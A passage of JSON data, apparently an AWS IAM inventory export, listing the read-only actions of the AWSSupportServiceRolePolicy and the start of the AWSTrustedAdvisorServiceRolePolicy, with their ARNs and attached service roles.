","glacier:getVaultLock","glacier:getVaultNotifications","glacier:listJobs","glacier:listTagsForVault","glacier:listVaults","globalaccelerator:describeAccelerator","globalaccelerator:describeAcceleratorAttributes","globalaccelerator:describeEndpointGroup","globalaccelerator:describeListener","globalaccelerator:listAccelerators","globalaccelerator:listEndpointGroups","globalaccelerator:listListeners","glue:batchGetPartition","glue:getCatalogImportStatus","glue:getClassifier","glue:getClassifiers","glue:getCrawler","glue:getCrawlerMetrics","glue:getCrawlers","glue:getDatabase","glue:getDatabases","glue:getDataflowGraph","glue:getDevEndpoint","glue:getDevEndpoints","glue:getJob","glue:getJobRun","glue:getJobRuns","glue:getJobs","glue:getMapping","glue:getPartition","glue:getPartitions","glue:getTable","glue:getTableVersions","glue:getTables","glue:getTrigger","glue:getTriggers","glue:getUserDefinedFunction","glue:getUserDefinedFunctions","greengrass:getConnectivityInfo","greengrass:getCoreDefinition","greengrass:getCoreDefinitionVersion","greengrass:getDeploymentStatus","greengrass:getDeviceDefinition","greengrass:getDeviceDefinitionVersion","greengrass:getFunctionDefinition","greengrass:getFunctionDefinitionVersion","greengrass:getGroup","greengrass:getGroupCertificateAuthority","greengrass:getGroupVersion","greengrass:getLoggerDefinition","greengrass:getLoggerDefinitionVersion","greengrass:getResourceDefinitionVersion","greengrass:getServiceRoleForAccount","greengrass:getSubscriptionDefinition","greengrass:getSubscriptionDefinitionVersion","greengrass:listCoreDefinitionVersions","greengrass:listCoreDefinitions","greengrass:listDeployments","greengrass:listDeviceDefinitionVersions","greengrass:listDeviceDefinitions","greengrass:listFunctionDefinitionVersions","greengrass:listFunctionDefinitions","greengrass:listGroupVersions","greengrass:listGroups","greengrass:listLoggerDefinitionVersions","greengrass:listLoggerDefinitions","greengrass:listResourceDefinitionVersions","greengrass:listResourceDefinitions","greengrass:listSubscriptionDefinitionVersions","greengrass:listSubscriptionDefinitions","guardduty:getDetector","guardduty:getFindings","guardduty:getFindingsStatistics","guardduty:getIPSet","guardduty:getInvitationsCount","guardduty:getMasterAccount","guardduty:getMembers","guardduty:getThreatIntelSet","guardduty:listDetectors","guardduty:listFindings","guardduty:listIPSets","guardduty:listInvitations","guardduty:listMembers","guardduty:listThreatIntelSets","health:describeAffectedEntities","health:describeEntityAggregates","health:describeEventAggregates","health:describeEventDetails","health:describeEventTypes","health:describeEvents","iam:getAccessKeyLastUsed","iam:getAccountAuthorizationDetails","iam:getAccountPasswordPolicy","iam:getAccountSummary","iam:getContextKeysForCustomPolicy","iam:getContextKeysForPrincipalPolicy","iam:getCredentialReport","iam:getGroup","iam:getGroupPolicy","iam:getInstanceProfile","iam:getLoginProfile","iam:getOpenIDConnectProvider","iam:getPolicy","iam:getPolicyVersion","iam:getRole","iam:getRolePolicy","iam:getSAMLProvider","iam:getSSHPublicKey","iam:getServerCertificate","iam:getUser","iam:getUserPolicy","iam:listAccessKeys","iam:listAccountAliases","iam:listAttachedGroupPolicies","iam:listAttachedRolePolicies","iam:listAttachedUserPolicies","iam:listEntitiesForPolicy","iam:listGroupPolicies","iam:listGroups","iam:listGroupsForUser","iam:listInstanceProfiles","iam:listInstanceProfilesForRole","iam:listMFADevices","iam:listOpenIDConnectProviders","iam:listPolicies","iam:listPolicyVersions","iam:listRolePolicies","iam:listRoles","iam:listSAMLProviders","iam:listSSHPublicKeys","iam:listServerCertificates","iam:listSigningCertificates","iam:listUserPolicies","iam:listUsers","iam:listVirtualMFADevices","iam:simulateCustomPolicy","iam:simulatePrincipalPolicy","imagebuilder:getComponent","imagebuilder:getComponentPolicy","imagebuilder:getDistributionConfiguration","imagebuilder:getImage","imagebuilder:getImagePipeline","imagebuilder:getImagePolicy","imagebuilder:getImageRecipe","imagebuilder:getImageRecipePolicy","imagebuilder:getInfrastructureConfiguration","imagebuilder:listComponentBuildVersions","imagebuilder:listComponents","imagebuilder:listDistributionConfigurations","imagebuilder:listImageBuildVersions","imagebuilder:listImagePipelineImages","imagebuilder:listImagePipelines","imagebuilder:listImageRecipes","imagebuilder:listImages","imagebuilder:listInfrastructureConfigurations","imagebuilder:listTagsForResource","importexport:getStatus","importexport:listJobs","inspector:describeAssessmentRuns","inspector:describeAssessmentTargets","inspector:describeAssessmentTemplates","inspector:describeCrossAccountAccessRole","inspector:describeResourceGroups","inspector:describeRulesPackages","inspector:getTelemetryMetadata","inspector:listAssessmentRunAgents","inspector:listAssessmentRuns","inspector:listAssessmentTargets","inspector:listAssessmentTemplates","inspector:listEventSubscriptions","inspector:listRulesPackages","inspector:listTagsForResource","iot:describeAuthorizer","iot:describeCACertificate","iot:describeCertificate","iot:describeDefaultAuthorizer","iot:describeEndpoint","iot:describeIndex","iot:describeJobExecution","iot:describeThing","iot:describeThingGroup","iot:describeTunnel","iot:getEffectivePolicies","iot:getIndexingConfiguration","iot:getLoggingOptions","iot:getPolicy","iot:getPolicyVersion","iot:getTopicRule","iot:getV2LoggingOptions","iot:listAttachedPolicies","iot:listAuthorizers","iot:listCACertificates","iot:listCertificates","iot:listCertificatesByCA","iot:listJobExecutionsForJob","iot:listJobExecutionsForThing","iot:listJobs","iot:listOutgoingCertificates","iot:listPolicies","iot:listPolicyPrincipals","iot:listPolicyVersions","iot:listPrincipalPolicies","iot:listPrincipalThings","iot:listRoleAliases","iot:listTargetsForPolicy","iot:listThingGroups","iot:listThingGroupsForThing","iot:listThingPrincipals","iot:listThingRegistrationTasks","iot:listThingTypes","iot:listThings","iot:listTopicRules","iot:listTunnels","iot:listV2LoggingLevels","iotevents:describeDetector","iotevents:describeDetectorModel","iotevents:describeInput","iotevents:describeLoggingOptions","iotevents:listDetectorModelVersions","iotevents:listDetectorModels","iotevents:listDetectors","iotevents:listInputs","iotsitewise:describeAccessPolicy","iotsitewise:describeAsset","iotsitewise:describeAssetModel","iotsitewise:describeAssetProperty","iotsitewise:describeDashboard","iotsitewise:describeGateway","iotsitewise:describeGatewayCapabilityConfiguration","iotsitewise:describeLoggingOptions","iotsitewise:describePortal","iotsitewise:describeProject","iotsitewise:listAccessPolicies","iotsitewise:listAssetModels","iotsitewise:listAssociatedAssets","iotsitewise:listDashboards","iotsitewise:listGateways","iotsitewise:listPortals","iotsitewise:listProjectAssets","iotsitewise:listProjects","kafka:describeCluster","kafka:getBootstrapBrokers","kafka:listClusters","kafka:listNodes","kendra:describeDataSource","kendra:describeFaq","kendra:describeIndex","kendra:getDataSourceSyncJobHistory","kendra:listDataSources","kendra:listFaqs","kendra:listIndices","kinesis:describeStream","kinesis:listStreams","kinesis:listTagsForStream","kinesisanalytics:describeApplication","kinesisanalytics:listApplications","kms:describeKey","kms:getKeyPolicy","kms:getKeyRotationStatus","kms:listAliases","kms:listGrants","kms:listKeyPolicies","kms:listKeys","kms:listResourceTags","kms:listRetirableGrants","lambda:getAccountSettings","lambda:getAlias","lambda:getEventSourceMapping","lambda:getFunction","lambda:getFunctionConcurrency","lambda:getFunctionConfiguration","lambda:getFunctionEventInvokeConfig","lambda:getLayerVersion","lambda:getLayerVersionPolicy","lambda:getPolicy","lambda:getProvisionedConcurrencyConfig","lambda:listAliases","lambda:listEventSourceMappings","lambda:listFunctionEventInvokeConfigs","lambda:listFunctions","lambda:listLayerVersions","lambda:listLayers","lambda:listProvisionedConcurrencyConfigs","lambda:listVersionsByFunction","launchwizard:describeProvisionedApp","launchwizard:describeProvisioningEvents","launchwizard:listProvisionedApps","lex:getBot","lex:getBotAlias","lex:getBotAliases","lex:getBotChannelAssociation","lex:getBotChannelAssociations","lex:getBotVersions","lex:getBots","lex:getBuiltinIntent","lex:getBuiltinIntents","lex:getBuiltinSlotTypes","lex:getIntent","lex:getIntentVersions","lex:getIntents","lex:getSlotType","lex:getSlotTypeVersions","lex:getSlotTypes","license-manager:getLicenseConfiguration","license-manager:getServiceSettings","license-manager:listAssociationsForLicenseConfiguration","license-manager:listFailuresForLicenseConfigurationOperations","license-manager:listLicenseConfigurations","license-manager:listLicenseSpecificationsForResource","license-manager:listResourceInventory","license-manager:listUsageForLicenseConfiguration","lightsail:getActiveNames","lightsail:getBlueprints","lightsail:getBundles","lightsail:getDomain","lightsail:getDomains","lightsail:getInstance","lightsail:getInstanceMetricData","lightsail:getInstancePortStates","lightsail:getInstanceSnapshot","lightsail:getInstanceSnapshots","lightsail:getInstanceState","lightsail:getInstances","lightsail:getKeyPair","lightsail:getKeyPairs","lightsail:getOperation","lightsail:getOperations","lightsail:getOperationsForResource","lightsail:getRegions","lightsail:getStaticIp","lightsail:getStaticIps","logs:describeDestinations","logs:describeExportTasks","logs:describeLogGroups","logs:describeLogStreams","logs:describeMetricFilters","logs:describeQueries","logs:describeSubscriptionFilters","logs:testMetricFilter","machinelearning:describeBatchPredictions","machinelearning:describeDataSources","machinelearning:describeEvaluations","machinelearning:describeMLModels","machinelearning:getBatchPrediction","machinelearning:getDataSource","machinelearning:getEvaluation","machinelearning:getMLModel","managedblockchain:getMember","managedblockchain:getNetwork","managedblockchain:getNode","managedblockchain:listMembers","managedblockchain:listNetworks","managedblockchain:listNodes","mediaconvert:describeEndpoints","mediaconvert:getJob","mediaconvert:getJobTemplate","mediaconvert:getPreset","mediaconvert:getQueue","mediaconvert:listJobTemplates","mediaconvert:listJobs","medialive:describeChannel","medialive:describeInput","medialive:describeInputDevice","medialive:describeInputSecurityGroup","medialive:describeMultiplex","medialive:describeOffering","medialive:describeReservation","medialive:describeSchedule","medialive:listChannels","medialive:listInputDevices","medialive:listInputSecurityGroups","medialive:listInputs","medialive:listMultiplexes","medialive:listOfferings","medialive:listReservations","mediapackage:describeChannel","mediapackage:describeOriginEndpoint","mediapackage:listChannels","mediapackage:listOriginEndpoints","mediastore:describeContainer","mediastore:describeObject","mediastore:getContainerPolicy","mediastore:getCorsPolicy","mediastore:listContainers","mediastore:listItems","mediatailor:getPlaybackConfiguration","mediatailor:listPlaybackConfigurations","mobiletargeting:getAdmChannel","mobiletargeting:getApnsChannel","mobiletargeting:getApnsSandboxChannel","mobiletargeting:getApnsVoipChannel","mobiletargeting:getApnsVoipSandboxChannel","mobiletargeting:getApp","mobiletargeting:getApplicationSettings","mobiletargeting:getApps","mobiletargeting:getBaiduChannel","mobiletargeting:getCampaign","mobiletargeting:getCampaignActivities","mobiletargeting:getCampaignVersion","mobiletargeting:getCampaignVersions","mobiletargeting:getCampaigns","mobiletargeting:getEmailChannel","mobiletargeting:getEndpoint","mobiletargeting:getEventStream","mobiletargeting:getExportJob","mobiletargeting:getExportJobs","mobiletargeting:getGcmChannel","mobiletargeting:getImportJob","mobiletargeting:getImportJobs","mobiletargeting:getSegment","mobiletargeting:getSegmentImportJobs","mobiletargeting:getSegmentVersion","mobiletargeting:getSegmentVersions","mobiletargeting:getSegments","mobiletargeting:getSmsChannel","mq:describeBroker","mq:describeConfiguration","mq:describeConfigurationRevision","mq:describeUser","mq:listBrokers","mq:listConfigurationRevisions","mq:listConfigurations","mq:listUsers","networkmanager:describeGlobalNetworks","networkmanager:getCustomerGatewayAssociations","networkmanager:getDevices","networkmanager:getLinkAssociations","networkmanager:getLinks","networkmanager:getSites","networkmanager:getTransitGatewayRegistrations","opsworks-cm:describeAccountAttributes","opsworks-cm:describeBackups","opsworks-cm:describeEvents","opsworks-cm:describeNodeAssociationStatus","opsworks-cm:describeServers","opsworks:describeAgentVersions","opsworks:describeApps","opsworks:describeCommands","opsworks:describeDeployments","opsworks:describeEcsClusters","opsworks:describeElasticIps","opsworks:describeElasticLoadBalancers","opsworks:describeInstances","opsworks:describeLayers","opsworks:describeLoadBasedAutoScaling","opsworks:describeMyUserProfile","opsworks:describePermissions","opsworks:describeRaidArrays","opsworks:describeRdsDbInstances","opsworks:describeServiceErrors","opsworks:describeStackProvisioningParameters","opsworks:describeStackSummary","opsworks:describeStacks","opsworks:describeTimeBasedAutoScaling","opsworks:describeUserProfiles","opsworks:describeVolumes","opsworks:getHostnameSuggestion","outposts:getOutpost","outposts:getOutpostInstanceTypes","outposts:listOutposts","outposts:listSites","personalize:describeAlgorithm","personalize:describeCampaign","personalize:describeDataset","personalize:describeDatasetGroup","personalize:describeDatasetImportJob","personalize:describeEventTracker","personalize:describeFeatureTransformation","personalize:describeRecipe","personalize:describeSchema","personalize:describeSolution","personalize:describeSolutionVersion","personalize:listCampaigns","personalize:listDatasetGroups","personalize:listDatasetImportJobs","personalize:listDatasets","personalize:listEventTrackers","personalize:listRecipes","personalize:listSchemas","personalize:listSolutionVersions","personalize:listSolutions","polly:describeVoices","polly:getLexicon","polly:listLexicons","pricing:describeServices","pricing:getAttributeValues","pricing:getProducts","quicksight:describeDashboard","quicksight:describeDashboardPermissions","quicksight:describeGroup","quicksight:describeIAMPolicyAssignment","quicksight:describeTemplate","quicksight:describeTemplateAlias","quicksight:describeTemplatePermissions","quicksight:describeUser","quicksight:listDashboards","quicksight:listGroupMemberships","quicksight:listGroups","quicksight:listIAMPolicyAssignments","quicksight:listIAMPolicyAssignmentsForUser","quicksight:listTemplateAliases","quicksight:listTemplateVersions","quicksight:listTemplates","quicksight:listUserGroups","quicksight:listUsers","rds:describeAccountAttributes","rds:describeCertificates","rds:describeDBClusterParameterGroups","rds:describeDBClusterParameters","rds:describeDBClusterSnapshots","rds:describeDBClusters","rds:describeDBEngineVersions","rds:describeDBInstances","rds:describeDBParameterGroups","rds:describeDBParameters","rds:describeDBSecurityGroups","rds:describeDBSnapshotAttributes","rds:describeDBSnapshots","rds:describeDBSubnetGroups","rds:describeEngineDefaultClusterParameters","rds:describeEngineDefaultParameters","rds:describeEventCategories","rds:describeEventSubscriptions","rds:describeEvents","rds:describeOptionGroupOptions","rds:describeOptionGroups","rds:describeOrderableDBInstanceOptions","rds:describePendingMaintenanceActions","rds:describeReservedDBInstances","rds:describeReservedDBInstancesOfferings","rds:listTagsForResource","redshift:describeClusterParameterGroups","redshift:describeClusterParameters","redshift:describeClusterSecurityGroups","redshift:describeClusterSnapshots","redshift:describeClusterSubnetGroups","redshift:describeClusterVersions","redshift:describeClusters","redshift:describeDefaultClusterParameters","redshift:describeEventCategories","redshift:describeEventSubscriptions","redshift:describeEvents","redshift:describeHsmClientCertificates","redshift:describeHsmConfigurations","redshift:describeLoggingStatus","redshift:describeOrderableClusterOptions","redshift:describeReservedNodeOfferings","redshift:describeReservedNodes","redshift:describeResize","redshift:describeSnapshotCopyGrants","redshift:describeStorage","redshift:describeTableRestoreStatus","redshift:describeTags","rekognition:listCollections","rekognition:listFaces","resource-groups:getGroup","resource-groups:getGroupQuery","resource-groups:getTags","resource-groups:listGroupResources","resource-groups:listGroups","resource-groups:searchResources","robomaker:batchDescribeSimulationJob","robomaker:describeDeploymentJob","robomaker:describeFleet","robomaker:describeRobot","robomaker:describeRobotApplication","robomaker:describeSimulationApplication","robomaker:describeSimulationJob","robomaker:listDeploymentJobs","robomaker:listFleets","robomaker:listRobotApplications","robomaker:listRobots","robomaker:listSimulationApplications","robomaker:listSimulationJobs","route53:getChange","route53:getCheckerIpRanges","route53:getGeoLocation","route53:getHealthCheck","route53:getHealthCheckCount","route53:getHealthCheckLastFailureReason","route53:getHealthCheckStatus","route53:getHostedZone","route53:getHostedZoneCount","route53:getReusableDelegationSet","route53:getTrafficPolicy","route53:getTrafficPolicyInstance","route53:getTrafficPolicyInstanceCount","route53:listGeoLocations","route53:listHealthChecks","route53:listHostedZones","route53:listHostedZonesByName","route53:listResourceRecordSets","route53:listReusableDelegationSets","route53:listTagsForResource","route53:listTagsForResources","route53:listTrafficPolicies","route53:listTrafficPolicyInstances","route53:listTrafficPolicyInstancesByHostedZone","route53:listTrafficPolicyInstancesByPolicy","route53:listTrafficPolicyVersions","route53domains:checkDomainAvailability","route53domains:getContactReachabilityStatus","route53domains:getDomainDetail","route53domains:getOperationDetail","route53domains:listDomains","route53domains:listOperations","route53domains:listTagsForDomain","route53domains:viewBilling","route53resolver:getResolverRulePolicy","route53resolver:listResolverEndpointIpAddresses","route53resolver:listResolverEndpoints","route53resolver:listResolverRuleAssociations","route53resolver:listResolverRules","route53resolver:listTagsForResource","s3:getAccelerateConfiguration","s3:getAnalyticsConfiguration","s3:getBucketAcl","s3:getBucketCORS","s3:getBucketLocation","s3:getBucketLogging","s3:getBucketNotification","s3:getBucketPolicy","s3:getBucketRequestPayment","s3:getBucketTagging","s3:getBucketVersioning","s3:getBucketWebsite","s3:getEncryptionConfiguration","s3:getInventoryConfiguration","s3:getLifecycleConfiguration","s3:getMetricsConfiguration","s3:getReplicationConfiguration","s3:listAllMyBuckets","s3:listBucket","s3:listBucketMultipartUploads","sagemaker:describeAlgorithm","sagemaker:describeApp","sagemaker:describeAutoMLJob","sagemaker:describeCompilationJob","sagemaker:describeDomain","sagemaker:describeEndpoint","sagemaker:describeEndpointConfig","sagemaker:describeExperiment","sagemaker:describeHumanTaskUi","sagemaker:describeHyperParameterTuningJob","sagemaker:describeLabelingJob","sagemaker:describeModel","sagemaker:describeModelPackage","sagemaker:describeMonitoringSchedule","sagemaker:describeNotebookInstance","sagemaker:describeNotebookInstanceLifecycleConfig","sagemaker:describeProcessingJob","sagemaker:describeSubscribedWorkteam","sagemaker:describeTrainingJob","sagemaker:describeTransformJob","sagemaker:describeTrial","sagemaker:describeTrialComponent","sagemaker:describeUserProfile","sagemaker:describeWorkteam","sagemaker:listAlgorithms","sagemaker:listApps","sagemaker:listAutoMLJobs","sagemaker:listCandidatesForAutoMLJob","sagemaker:listCodeRepositories","sagemaker:listCompilationJobs","sagemaker:listDomains","sagemaker:listEndpointConfigs","sagemaker:listEndpoints","sagemaker:listExperiments","sagemaker:listFlowDefinitions","sagemaker:listHumanTaskUis","sagemaker:listHyperParameterTuningJobs","sagemaker:listLabelingJobs","sagemaker:listLabelingJobsForWorkteam","sagemaker:listModelPackages","sagemaker:listModels","sagemaker:listMonitoringExecutions","sagemaker:listMonitoringSchedules","sagemaker:listNotebookInstanceLifecycleConfigs","sagemaker:listNotebookInstances","sagemaker:listProcessingJobs","sagemaker:listSubscribedWorkteams","sagemaker:listTags","sagemaker:listTrainingJobs","sagemaker:listTrainingJobsForHyperParameterTuningJob","sagemaker:listTransformJobs","sagemaker:listTrialComponents","sagemaker:listTrials","sagemaker:listUserProfiles","sagemaker:listWorkteams","sdb:domainMetadata","sdb:listDomains","secretsmanager:describeSecret","secretsmanager:getResourcePolicy","secretsmanager:listSecretVersionIds","secretsmanager:listSecrets","securityhub:getEnabledStandards","securityhub:getFindings","securityhub:getInsightResults","securityhub:getInsights","securityhub:getMasterAccount","securityhub:getMembers","securityhub:listEnabledProductsForImport","securityhub:listInvitations","securityhub:listMembers","servicecatalog:describeConstraint","servicecatalog:describePortfolio","servicecatalog:describeProduct","servicecatalog:describeProductAsAdmin","servicecatalog:describeProductView","servicecatalog:describeProvisioningArtifact","servicecatalog:describeProvisioningParameters","servicecatalog:describeRecord","servicecatalog:listAcceptedPortfolioShares","servicecatalog:listConstraintsForPortfolio","servicecatalog:listLaunchPaths","servicecatalog:listPortfolioAccess","servicecatalog:listPortfolios","servicecatalog:listPortfoliosForProduct","servicecatalog:listPrincipalsForPortfolio","servicecatalog:listProvisioningArtifacts","servicecatalog:listRecordHistory","servicecatalog:scanProvisionedProducts","servicecatalog:searchProducts","servicequotas:getAWSDefaultServiceQuota","servicequotas:getAssociationForServiceQuotaTemplate","servicequotas:getRequestedServiceQuotaChange","servicequotas:getServiceQuota","servicequotas:getServiceQuotaIncreaseRequestFromTemplate","servicequotas:listAWSDefaultServiceQuotas","servicequotas:listRequestedServiceQuotaChangeHistory","servicequotas:listRequestedServiceQuotaChangeHistoryByQuota","servicequotas:listServiceQuotaIncreaseRequestsInTemplate","servicequotas:listServiceQuotas","servicequotas:listServices","ses:describeActiveReceiptRuleSet","ses:describeReceiptRule","ses:describeReceiptRuleSet","ses:getAccount","ses:getBlacklistReports","ses:getConfigurationSet","ses:getConfigurationSetEventDestinations","ses:getDedicatedIp","ses:getDedicatedIps","ses:getDeliverabilityDashboardOptions","ses:getDeliverabilityTestReport","ses:getDomainDeliverabilityCampaign","ses:getDomainStatisticsReport","ses:getEmailIdentity","ses:getIdentityDkimAttributes","ses:getIdentityMailFromDomainAttributes","ses:getIdentityNotificationAttributes","ses:getIdentityPolicies","ses:getIdentityVerificationAttributes","ses:getSendQuota","ses:getSendStatistics","ses:listConfigurationSets","ses:listDedicatedIpPools","ses:listDeliverabilityTestReports","ses:listDomainDeliverabilityCampaigns","ses:listEmailIdentities","ses:listIdentities","ses:listIdentityPolicies","ses:listReceiptFilters","ses:listReceiptRuleSets","ses:listTagsForResource","ses:listVerifiedEmailAddresses","shield:describeAttack","shield:describeProtection","shield:describeSubscription","shield:listAttacks","shield:listProtections","sms-voice:getConfigurationSetEventDestinations","sms:getConnectors","sms:getReplicationJobs","sms:getReplicationRuns","sms:getServers","snowball:describeAddress","snowball:describeAddresses","snowball:describeJob","snowball:getSnowballUsage","snowball:listJobs","sns:checkIfPhoneNumberIsOptedOut","sns:getEndpointAttributes","sns:getPlatformApplicationAttributes","sns:getSMSAttributes","sns:getSubscriptionAttributes","sns:getTopicAttributes","sns:listEndpointsByPlatformApplication","sns:listPhoneNumbersOptedOut","sns:listPlatformApplications","sns:listSubscriptions","sns:listSubscriptionsByTopic","sns:listTopics","sqs:getQueueAttributes","sqs:getQueueUrl","sqs:listDeadLetterSourceQueues","sqs:listQueues","ssm:describeActivations","ssm:describeAssociation","ssm:describeAssociationExecutionTargets","ssm:describeAssociationExecutions","ssm:describeAutomationExecutions","ssm:describeAutomationStepExecutions","ssm:describeAvailablePatches","ssm:describeDocument","ssm:describeDocumentPermission","ssm:describeEffectiveInstanceAssociations","ssm:describeEffectivePatchesForPatchBaseline","ssm:describeInstanceAssociationsStatus","ssm:describeInstanceInformation","ssm:describeInstancePatchStates","ssm:describeInstancePatchStatesForPatchGroup","ssm:describeInstancePatches","ssm:describeInventoryDeletions","ssm:describeMaintenanceWindowExecutionTaskInvocations","ssm:describeMaintenanceWindowExecutionTasks","ssm:describeMaintenanceWindowExecutions","ssm:describeMaintenanceWindowSchedule","ssm:describeMaintenanceWindowTargets","ssm:describeMaintenanceWindowTasks","ssm:describeMaintenanceWindows","ssm:describeMaintenanceWindowsForTarget","ssm:describeParameters","ssm:describePatchBaselines","ssm:describePatchGroupState","ssm:describePatchGroups","ssm:describePatchProperties","ssm:describeSessions","ssm:getAutomationExecution","ssm:getCommandInvocation","ssm:getConnectionStatus","ssm:getDefaultPatchBaseline","ssm:getDeployablePatchSnapshotForInstance","ssm:getInventorySchema","ssm:getMaintenanceWindow","ssm:getMaintenanceWindowExecution","ssm:getMaintenanceWindowExecutionTask","ssm:getMaintenanceWindowExecutionTaskInvocation","ssm:getMaintenanceWindowTask","ssm:getPatchBaseline","ssm:getPatchBaselineForPatchGroup","ssm:getServiceSetting","ssm:labelParameterVersion","ssm:listAssociationVersions","ssm:listAssociations","ssm:listCommandInvocations","ssm:listCommands","ssm:listComplianceItems","ssm:listComplianceSummaries","ssm:listDocumentVersions","ssm:listDocuments","ssm:listResourceComplianceSummaries","ssm:listResourceDataSync","ssm:listTagsForResource","states:describeActivity","states:describeExecution","states:describeStateMachine","states:describeStateMachineForExecution","states:getExecutionHistory","states:listActivities","states:listExecutions","states:listStateMachines","storagegateway:describeBandwidthRateLimit","storagegateway:describeCache","storagegateway:describeCachediSCSIVolumes","storagegateway:describeGatewayInformation","storagegateway:describeMaintenanceStartTime","storagegateway:describeNFSFileShares","storagegateway:describeSMBFileShares","storagegateway:describeSMBSettings","storagegateway:describeSnapshotSchedule","storagegateway:describeStorediSCSIVolumes","storagegateway:describeTapeArchives","storagegateway:describeTapeRecoveryPoints","storagegateway:describeTapes","storagegateway:describeUploadBuffer","storagegateway:describeVTLDevices","storagegateway:describeWorkingStorage","storagegateway:listFileShares","storagegateway:listGateways","storagegateway:listLocalDisks","storagegateway:listTagsForResource","storagegateway:listTapes","storagegateway:listVolumeInitiators","storagegateway:listVolumeRecoveryPoints","storagegateway:listVolumes","swf:countClosedWorkflowExecutions","swf:countOpenWorkflowExecutions","swf:countPendingActivityTasks","swf:countPendingDecisionTasks","swf:describeActivityType","swf:describeDomain","swf:describeWorkflowExecution","swf:describeWorkflowType","swf:getWorkflowExecutionHistory","swf:listActivityTypes","swf:listClosedWorkflowExecutions","swf:listDomains","swf:listOpenWorkflowExecutions","swf:listWorkflowTypes","transfer:describeServer","transfer:describeUser","transfer:listServers","transfer:listTagsForResource","transfer:listUsers","waf-regional:getByteMatchSet","waf-regional:getChangeTokenStatus","waf-regional:getIPSet","waf-regional:getRule","waf-regional:getSqlInjectionMatchSet","waf-regional:getWebACL","waf-regional:getWebACLForResource","waf-regional:listByteMatchSets","waf-regional:listIPSets","waf-regional:listResourcesForWebACL","waf-regional:listRules","waf-regional:listSqlInjectionMatchSets","waf-regional:listWebACLs","waf:getByteMatchSet","waf:getChangeTokenStatus","waf:getIPSet","waf:getRule","waf:getSampledRequests","waf:getSizeConstraintSet","waf:getSqlInjectionMatchSet","waf:getWebACL","waf:getXssMatchSet","waf:listByteMatchSets","waf:listIPSets","waf:listRules","waf:listSizeConstraintSets","waf:listSqlInjectionMatchSets","waf:listWebACLs","waf:listXssMatchSets","wafv2:checkCapacity","wafv2:describeManagedRuleGroup","wafv2:getIPSet","wafv2:getLoggingConfiguration","wafv2:getPermissionPolicy","wafv2:getRateBasedStatementManagedKeys","wafv2:getRegexPatternSet","wafv2:getRuleGroup","wafv2:getSampledRequests","wafv2:getWebACL","wafv2:getWebACLForResource","wafv2:listAvailableManagedRuleGroups","wafv2:listIPSets","wafv2:listLoggingConfigurations","wafv2:listRegexPatternSets","wafv2:listResourcesForWebACL","wafv2:listRuleGroups","wafv2:listTagsForResource","wafv2:listWebACLs","workdocs:checkAlias","workdocs:describeAvailableDirectories","workdocs:describeInstances","worklink:describeAuditStreamConfiguration","worklink:describeCompanyNetworkConfiguration","worklink:describeDevice","worklink:describeDevicePolicyConfiguration","worklink:describeDomain","worklink:describeFleetMetadata","worklink:describeIdentityProviderConfiguration","worklink:describeWebsiteCertificateAuthority","worklink:listDevices","worklink:listDomains","worklink:listFleets","worklink:listWebsiteAuthorizationProviders","worklink:listWebsiteCertificateAuthorities","workmail:describeGroup","workmail:describeOrganization","workmail:describeResource","workmail:describeUser","workmail:listAliases","workmail:listGroupMembers","workmail:listGroups","workmail:listMailboxPermissions","workmail:listOrganizations","workmail:listResourceDelegates","workmail:listResources","workmail:listUsers","workspaces:describeAccount","workspaces:describeAccountModifications","workspaces:describeIpGroups","workspaces:describeTags","workspaces:describeWorkspaceBundles","workspaces:describeWorkspaceDirectories","workspaces:describeWorkspaceImages","workspaces:describeWorkspaces","workspaces:describeWorkspacesConnectionStatus"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/aws-service-role/AWSSupportServiceRolePolicy","attached_to": {"roles": [{"id": "AROAJCXETX2ROIWUKOPGG","name": "AWSServiceRoleForSupport"}]},"id": "ANPAJ7W6266ELXF5MISDS","name": "AWSSupportServiceRolePolicy"},"ANPAJH4QJ2WMHBOB47BUE": {"PolicyDocument": {"Statement": [{"Action": ["autoscaling:DescribeAccountLimits","autoscaling:DescribeAutoScalingGroups","autoscaling:DescribeLaunchConfigurations","cloudformation:DescribeAccountLimits","cloudformation:DescribeStacks","cloudformation:ListStacks","cloudfront:ListDistributions","cloudtrail:DescribeTrails","cloudtrail:GetTrailStatus","dynamodb:DescribeLimits","dynamodb:DescribeTable","dynamodb:ListTables","ec2:DescribeAddresses","ec2:DescribeReservedInstances","ec2:DescribeInstances","ec2:DescribeVpcs","ec2:DescribeInternetGateways","ec2:DescribeImages","ec2:DescribeVolumes","ec2:DescribeSecurityGroups","ec2:DescribeReservedInstancesOfferings","ec2:DescribeSnapshots","ec2:DescribeVpnConnections","ec2:DescribeVpnGateways","ec2:DescribeLaunchTemplateVersions","elasticloadbalancing:DescribeAccountLimits","elasticloadbalancing:DescribeInstanceHealth","elasticloadbalancing:DescribeLoadBalancerAttributes","elasticloadbalancing:DescribeLoadBalancerPolicies","elasticloadbalancing:DescribeLoadBalancerPolicyTypes","elasticloadbalancing:DescribeLoadBalancers","iam:GenerateCredentialReport","iam:GetAccountPasswordPolicy","iam:GetAccountSummary","iam:GetCredentialReport","iam:GetServerCertificate","iam:ListServerCertificates","kinesis:DescribeLimits","rds:DescribeAccountAttributes","rds:DescribeDBClusters","rds:DescribeDBEngineVersions","rds:DescribeDBInstances","rds:DescribeDBParameterGroups","rds:DescribeDBParameters","rds:DescribeDBSecurityGroups","rds:DescribeDBSnapshots","rds:DescribeDBSubnetGroups","rds:DescribeEngineDefaultParameters","rds:DescribeEvents","rds:DescribeOptionGroupOptions","rds:DescribeOptionGroups","rds:DescribeOrderableDBInstanceOptions","rds:DescribeReservedDBInstances","rds:DescribeReservedDBInstancesOfferings","rds:ListTagsForResource","redshift:DescribeClusters","redshift:DescribeReservedNodeOfferings","redshift:DescribeReservedNodes","route53:GetAccountLimit","route53:GetHealthCheck","route53:GetHostedZone","route53:ListHealthChecks","route53:ListHostedZones","route53:ListHostedZonesByName","route53:ListResourceRecordSets","s3:GetBucketAcl","s3:GetBucketPolicy","s3:GetBucketPolicyStatus","s3:GetBucketLocation","s3:GetBucketLogging","s3:GetBucketVersioning","s3:GetBucketPublicAccessBlock","s3:ListBucket","s3:ListAllMyBuckets","ses:GetSendQuota","sqs:ListQueues","cloudwatch:GetMetricStatistics","ce:GetReservationPurchaseRecommendation","ce:GetSavingsPlansPurchaseRecommendation"],"Effect": "Allow","Resource": ["*"]}],"Version": "2012-10-17"},"arn": "arn:aws:iam::aws:policy/aws-service-role/AWSTrustedAdvisorServiceRolePolicy","attached_to": {"roles": [{"id": 